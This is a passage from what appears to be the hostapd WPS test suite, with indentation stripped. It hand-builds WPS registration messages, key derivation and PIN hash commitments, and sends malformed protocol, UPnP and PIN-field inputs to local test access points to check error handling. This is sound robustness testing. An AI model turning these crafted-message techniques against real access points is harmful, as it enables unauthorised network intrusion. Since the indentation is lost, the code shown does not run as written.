m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
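# e_hash1/e_hash2 are the Enrollee's commitments to the two halves of the
# PIN (sent in M3); e_s1/e_s2 are the corresponding secret nonces that are
# revealed inside the Encrypted Settings of M5 and M7 to prove PIN knowledge.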
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
logger.debug("Receive M8 from AP")
msg, m8_attrs, raw_m8_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M8)
return hapd, msg, e_nonce, r_nonce
@remote_compatible
def test_wps_ext_wsc_done_invalid(dev, apdev):
"""WPS proto: invalid WSC_Done"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = b'\x10\x00\x00'
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_wsc_done_no_msg_type(dev, apdev):
"""WPS proto: invalid WSC_Done"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
#attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_wsc_done_wrong_msg_type(dev, apdev):
"""WPS proto: WSC_Done with wrong Msg Type"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_WSC_ACK)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_wsc_done_no_e_nonce(dev, apdev):
"""WPS proto: WSC_Done without e_nonce"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
#attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
def test_wps_ext_wsc_done_no_r_nonce(dev, apdev):
"""WPS proto: WSC_Done without r_nonce"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m7_no_encr_settings(dev, apdev):
"""WPS proto: M7 without Encr Settings"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
#attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m1_workaround(dev, apdev):
"""WPS proto: M1 Manufacturer/Model workaround"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk, manufacturer='Apple TEST',
model_name='AirPort', config_methods=b'\xff\xff')
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
@remote_compatible
def test_ap_wps_disable_enable(dev, apdev):
"""WPS and DISABLE/ENABLE AP"""
hapd = wps_start_ap(apdev[0])
hapd.disable()
hapd.enable()
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
def test_ap_wps_upnp_web_oom(dev, apdev, params):
"""hostapd WPS UPnP web OOM"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
ctrlurl = urlparse(urls['control_url'])
conn = HTTPConnection(url.netloc)
with alloc_fail(hapd, 1, "web_connection_parse_get"):
conn.request("GET", "/wps_device.xml")
try:
resp = conn.getresponse()
except:
pass
conn = HTTPConnection(url.netloc)
conn.request("GET", "/unknown")
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP result for unknown URL: %d" + resp.status)
with alloc_fail(hapd, 1, "web_connection_parse_get"):
conn.request("GET", "/unknown")
try:
resp = conn.getresponse()
print(resp.status)
except:
pass
conn = HTTPConnection(url.netloc)
conn.request("GET", "/wps_device.xml")
resp = conn.getresponse()
if resp.status != 200:
raise Exception("GET /wps_device.xml failed")
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 200:
raise Exception("GetDeviceInfo failed")
with alloc_fail(hapd, 1, "web_process_get_device_info"):
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 500:
raise Exception("Internal error not reported from GetDeviceInfo OOM")
with alloc_fail(hapd, 1, "wps_build_m1;web_process_get_device_info"):
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 500:
raise Exception("Internal error not reported from GetDeviceInfo OOM")
with alloc_fail(hapd, 1, "wpabuf_alloc;web_connection_send_reply"):
conn = HTTPConnection(url.netloc)
try:
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
except:
pass
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 200:
raise Exception("GetDeviceInfo failed")
# No NewWLANEventType in PutWLANResponse NewMessage
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse", newmsg="foo")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# No NewWLANEventMAC in PutWLANResponse NewMessage
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="1")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# Invalid NewWLANEventMAC in PutWLANResponse NewMessage
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="1",
neweventmac="foo")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# Workaround for NewWLANEventMAC in PutWLANResponse NewMessage
# Ignored unexpected PutWLANResponse WLANEventType 1
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="1",
neweventmac="00.11.22.33.44.55")
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# PutWLANResponse NewMessage with invalid EAP message
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="2",
neweventmac="00:11:22:33:44:55")
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "web_connection_parse_subscribe"):
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except:
pass
with alloc_fail(hapd, 1, "dup_binstr;web_connection_parse_subscribe"):
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "wpabuf_alloc;web_connection_parse_unsubscribe"):
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except:
pass
with alloc_fail(hapd, 1, "web_connection_unimplemented"):
conn = HTTPConnection(url.netloc)
conn.request("HEAD", "/wps_device.xml")
try:
resp = conn.getresponse()
except:
pass
def test_ap_wps_frag_ack_oom(dev, apdev):
"""WPS and fragment ack OOM"""
dev[0].request("SET wps_fragment_size 50")
hapd = wps_start_ap(apdev[0])
with alloc_fail(hapd, 1, "eap_wsc_build_frag_ack"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
def wait_scan_stopped(dev):
dev.request("ABORT_SCAN")
for i in range(50):
res = dev.get_driver_status_field("scan_state")
if "SCAN_STARTED" not in res and "SCAN_REQUESTED" not in res:
break
logger.debug("Waiting for scan to complete")
time.sleep(0.1)
@remote_compatible
def test_ap_wps_eap_wsc_errors(dev, apdev):
"""WPS and EAP-WSC error cases"""
ssid = "test-wps-conf-pin"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"fragment_size": "300", "ap_pin": appin }
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin + " new_ssid=a", "new ssid", "WPA2PSK", "CCMP",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin, "new ssid", "FOO", "CCMP",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin, "new ssid", "WPA2PSK", "FOO",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin + "new_key=a", "new ssid", "WPA2PSK", "CCMP",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
tests = [ "eap_wsc_init",
"eap_msg_alloc;eap_wsc_build_msg",
"wpabuf_alloc;eap_wsc_process_fragment" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].request("WPS_PIN %s %s" % (bssid, pin))
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sm_build_expanded_nak"):
dev[0].wps_reg(bssid, appin + " new_ssid=a", "new ssid", "WPA2PSK",
"CCMP", "new passphrase", no_wait=True)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
def test_ap_wps_eap_wsc(dev, apdev):
"""WPS and EAP-WSC in network profile"""
params = int_eap_server_params()
params["wps_state"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
logger.info("Unexpected identity")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-unexpected",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("No phase1 parameter")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("No PIN/PBC in phase1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="foo", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Invalid pkhash in phase1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="foo pkhash=q pbc=1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Zero fragment_size")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
fragment_size="0", phase1="pin=12345670", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["WPS-M2D"], timeout=5)
if ev is None:
raise Exception("No M2D seen")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Missing new_auth")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670 new_ssid=aa", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Missing new_encr")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670 new_auth=WPA2PSK new_ssid=aa", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Missing new_key")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670 new_auth=WPA2PSK new_ssid=aa new_encr=CCMP",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_ap_wps_and_bss_limit(dev, apdev):
"""WPS and wpa_supplicant BSS entry limit"""
try:
_test_ap_wps_and_bss_limit(dev, apdev)
finally:
dev[0].request("SET bss_max_count 200")
pass
def _test_ap_wps_and_bss_limit(dev, apdev):
params = { "ssid": "test-wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "test-wps-2", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "1234567890", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
hapd2 = hostapd.add_ap(apdev[1], params)
id = dev[1].add_network()
dev[1].set_network(id, "mode", "2")
dev[1].set_network_quoted(id, "ssid", "wpas-ap-no-wps")
dev[1].set_network_quoted(id, "psk", "12345678")
dev[1].set_network(id, "frequency", "2462")
dev[1].set_network(id, "scan_freq", "2462")
dev[1].set_network(id, "wps_disabled", "1")
dev[1].select_network(id)
id = dev[2].add_network()
dev[2].set_network(id, "mode", "2")
dev[2].set_network_quoted(id, "ssid", "wpas-ap")
dev[2].set_network_quoted(id, "psk", "12345678")
dev[2].set_network(id, "frequency", "2437")
dev[2].set_network(id, "scan_freq", "2437")
dev[2].select_network(id)
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
id = wpas.add_network()
wpas.set_network(id, "mode", "2")
wpas.set_network_quoted(id, "ssid", "wpas-ap")
wpas.set_network_quoted(id, "psk", "12345678")
wpas.set_network(id, "frequency", "2437")
wpas.set_network(id, "scan_freq", "2437")
wpas.select_network(id)
dev[1].wait_connected()
dev[2].wait_connected()
wpas.wait_connected()
wpas.request("WPS_PIN any 12345670")
hapd.request("WPS_PBC")
hapd2.request("WPS_PBC")
dev[0].request("SET bss_max_count 1")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "testing")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "testing")
dev[0].set_network(id, "key_mgmt", "WPS")
dev[0].request("WPS_PBC")
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
dev[0].request("WPS_CANCEL")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "testing")
dev[0].set_network(id, "key_mgmt", "WPS")
dev[0].scan(freq="2412")
def test_ap_wps_pbc_2ap(dev, apdev):
"""WPS PBC with two APs advertising same SSID"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "123456789", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd2 = hostapd.add_ap(apdev[1], params)
hapd.request("WPS_PBC")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
wpas.dump_monitor()
wpas.scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
wpas.scan_for_bss(apdev[1]['bssid'], freq="2412")
wpas.request("WPS_PBC")
wpas.wait_connected()
wpas.request("DISCONNECT")
hapd.request("DISABLE")
hapd2.request("DISABLE")
wpas.flush_scan_cache()
def test_ap_wps_er_enrollee_to_conf_ap(dev, apdev):
"""WPS ER enrolling a new device to a configured AP"""
try:
_test_ap_wps_er_enrollee_to_conf_ap(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_enrollee_to_conf_ap(dev, apdev):
ssid = "wps-er-enrollee-to-conf-ap"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
id = dev[0].connect(ssid, psk="12345678", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
pin = dev[2].wps_read_pin()
addr2 = dev[2].own_addr()
dev[0].dump_monitor()
dev[2].scan_for_bss(bssid, freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (bssid, pin))
for i in range(3):
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr2 in ev:
break
if addr2 not in ev:
raise Exception("Unexpected Enrollee MAC address")
dev[0].dump_monitor()
dev[0].request("WPS_ER_SET_CONFIG " + ap_uuid + " " + str(id))
dev[0].request("WPS_ER_PIN " + addr2 + " " + pin + " " + addr2)
dev[2].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
def test_ap_wps_er_enrollee_to_conf_ap2(dev, apdev):
"""WPS ER enrolling a new device to a configured AP (2)"""
try:
_test_ap_wps_er_enrollee_to_conf_ap2(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_enrollee_to_conf_ap2(dev, apdev):
ssid = "wps-er-enrollee-to-conf-ap"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
